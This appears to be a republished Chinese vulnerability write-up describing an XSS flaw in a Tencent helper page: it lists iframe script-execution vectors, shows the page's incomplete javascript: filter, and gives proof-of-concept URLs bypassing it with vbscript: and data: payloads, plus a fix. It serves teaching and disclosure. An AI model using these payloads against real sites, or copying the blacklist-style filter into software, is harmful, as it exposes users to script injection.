来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 有时候,输出还会出现在 iframe src=[输出]/iframe 。 iframe 的 src属性本来应该是一个网址,但是iframe之善变,使得它同样可以执行javascript,而且可以用不同的姿势来执行。这一类问题,我将...
|
有时候,输出还会出现在 <iframe src="[输出]"></iframe> 。 iframe 的 src属性本来应该是一个网址,但是iframe之善变,使得它同样可以执行javascript,而且可以用不同的姿势来执行。这一类问题,我将其归为[路径可控]问题。当然上面说到的是普通的反射型XSS。有时候程序员会使用javascript来动态的改变iframe的src属性,譬如:iframeA.src="[可控的url]"; 同样会导致XSS问题,来看看本例吧~
详细说明:
1. 先来说说iframe的变化。
1.1 最好懂的,onload执行js
<iframe onload="alert(1)"></iframe>
1.2 src 执行javascript代码
<iframe src="javascript:alert(1)"></iframe>
1.3 IE下vbscript执行代码
<iframe src="vbscript:msgbox(1)"></iframe>
1.4 Chrome下data协议执行代码
<iframe src="data:text/html,<script>alert(1)</script>"></iframe> Chrome
1.5 上面的变体
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
1.6 Chrome下srcdoc属性
<iframe srcdoc="<script>alert(1)</script>"></iframe>
2. 有兴趣的,可以一个一个的去测试上面的效果,注意浏览器的特异性哦。
3. 接着我们来看看具体的例子。
http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=aaaaaa&gid=yl&cid=68&from=
4. 我们先开调试工具,看看有没有可见的输出。
 可以看到,我们参数的aaaaaa被带入到了<iframe src="这里"></iframe>。
这样一来,就满足了我们的使用条件。
我们试试
http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=javascript:alert(1);&gid=yl&cid=68&from=
。。竟然没反应。我们来看看刚才的那个地方。
 可以看到,src这次没属性了,看来腾讯做了什么过滤。我们继续搜索下一个toolframe试试。
恩,看来就是这段代码导致的。
 一起看看这段代码。
function OpenFrame(url) {
if (url.toLowerCase().indexOf('http://') != '-1' || url.toLowerCase().indexOf('https://') != '-1' || url.toLowerCase().indexOf('javascript:') != '-1') return false;
document.getElementById("toolframe").src = url;
}
不难看出,腾讯对 javascript:做出了判断。
document.getElementById("toolframe").src = url;
这句是导致XSS的一句代码。而openFrame的url参数则来自于(无关代码省略):
...
var tool_url = getQueryStringValue("turl");
...
openFrame(tool_url);
...
5. 根据我们上面说道的iframe的利用方法,我们不难看出,腾讯的过滤是不完善的。
在IE下,我们可以使用vbscript来执行代码。 vbscript里 ' 单引号表示注释,类似JS里的//
http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=vbscript:msgbox(1)'&gid=yl&cid=68&from=
 在chrome下,我们可以用data协议来执行JS。
http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=data:text/html,<script>alert(1)</script>'&gid=yl&cid=68&from=
 6. 就到这里。
修复方案:
危险的不光是javascript:,
vbscript:, data: 等同样需要过滤。
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
